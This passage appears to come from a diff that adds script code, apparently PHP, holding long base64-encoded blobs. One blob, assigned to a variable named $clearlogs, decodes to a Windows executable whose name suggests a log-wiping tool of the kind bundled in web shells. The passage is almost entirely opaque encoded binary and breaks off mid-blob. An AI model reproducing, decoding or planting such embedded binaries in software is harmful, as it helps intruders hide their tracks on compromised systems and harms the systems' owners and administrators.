+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==";
+
+$clearlogs = "TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAyAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1v
+ZGUuDQ0KJAAAAAAAAAB12cLfMbisjDG4rIwxuKyM2aenjDC4rIyypKKMOrisjFOnv4w0uKyMMbit
+jB+4rIzZp6aMGrisjFJpY2gxuKyMAAAAAAAAAABQRQAATAEDAEe3XzwAAAAAAAAAAOAADwELAQYA
+AEAAAABAAAAAAAAADhYAAAAQAAAAUAAAAABAAAAQAAAAEAAABAAAAAAAAAAEAAAAAAAAAACQAAAA
+EAAAAAAAAAMAAAAAABAAABAAAAAAEAAAEAAAAAAAABAAAAAAAAAAAAAAAJxUAAA8AAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAUAAAvAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC50ZXh0AAAA
+Bj8AAAAQAAAAQAAAABAAAAAAAAAAAAAAAAAAACAAAGAucmRhdGEAALAIAAAAUAAAABAAAABQAAAA
+AAAAAAAAAAAAAABAAABALmRhdGEAAADcIQAAAGAAAAAQAAAAYAAAAAAAAAAAAAAAAAAAQAAAwAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFFWaEBuQABo
+QGxAAP8VAFBAAIvwhfZ1UGh4YEAA6LAEAACDxASNRCQEVlZQaAAEAAD/FRBQQABQVmgAEwAA/xUU
+UEAAi0wkBFFodGBAAOh/BAAAi1QkDIPECFL/FVxQQABqAeiVAwAAagBW/xUEUEAAhcB1U2hUYEAA
+6FMEAACDxASNRCQEagBqAFBoAAQAAP8VEFBAAFBqAGgAEwAA/xUUUEAAi0wkBFFodGBAAOgfBAAA
+i1QkDIPECFL/FVxQQABqAeg1AwAAaDBgQADoAAQAAIPEBFb/FQhQQABeWcOQU1ZXaOxhQADo5QMA
+AGikYUAA6NsDAABoaGFAAOjRAwAAi0QkHIPEDDPbg/gCD4U1AQAAi0QkFL5gYUAAi3gEi8eKEIrK
+OhZ1HITJdBSKUAGKyjpWAXUOg8ACg8YChMl14DPA6wUbwIPY/4XAdSehVGFAAIsNWGFAAIsVXGFA
+AKNAbkAAiQ1EbkAAiRVIbkAA6bcAAAC+TGFAAIvHihCKyjoWdRyEyXQUilABiso6VgF1DoPAAoPG
+AoTJdeAzwOsFG8CD2P+FwHUkoUBhQACLDURhQACKFUhhQACjQG5AAIkNRG5AAIgVSG5AAOtfvjhh
+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
